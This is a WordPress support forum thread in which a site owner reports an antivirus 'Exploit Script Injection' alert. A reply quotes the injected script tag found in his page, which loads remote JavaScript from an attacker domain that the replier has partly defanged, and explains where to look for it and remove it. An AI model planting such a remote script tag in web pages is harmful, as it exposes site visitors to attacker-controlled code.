WordPress.org

Ready to get started?Download WordPress

Forums

Exploit Script Injection (type 1573) (3 posts)

  1. mandrakeman
    Member
    Posted 4 years ago #

    Hi,

    I originally built the http://www.marinecourtapartment.co.uk site about a year ago and for sometime it's been ok with the periodic updates to WordPress, until now. I'm running 3.0.1. with the Atahualpa skin - which does need updating, but it says i'll lose the - many - changes i've made if i do, which seems pretty crap. I'm sure there must be a way around that, so if you know of step-by-step instructions.

    Anyway, AVG generates an 'Exploit Script Injection (type 1573)'. I'm not really up on databases and WordPress generally, I tend to just code HTML and PHP sites, so all step-by-step help appreciated.

    It is now both hard to get on to the site and to get to the log-in screen. The other error comes up as 94.136.40.103 which is an ISP address i'm guessing that rogue code is trying to access.

    Any help with this very annoying issue would be very much appreciated.

    Thanks

    Chris

    p.s. Whilst I'm at it, i don't have ALTER-rights, how do i change that, i'm guessing with the server provider?

    p.p.s. i use both Firefox & Explorer, this issue arises with both.

  2. Mark
    Member
    Posted 4 years ago #

    At the bottom of your home page there is a script embedded, like this:

    <script src="http://______onlineisdudescars.com/co.php"></script>

    I added the underscores into the URL to somewhat disable it.

    Anyway, I think you need to find that code and get rid of it. Check your footer.php file in your theme, or you index.php file if you don't have a footer file. If it's not there, it might be in a plugin or in your database.

  3. After clearing out the line that M mentioned, carefully follow this guide. When you're done, you may want to implement some (if not all) of the recommended security measures.

Topic Closed

This topic has been closed to new replies.

About this Topic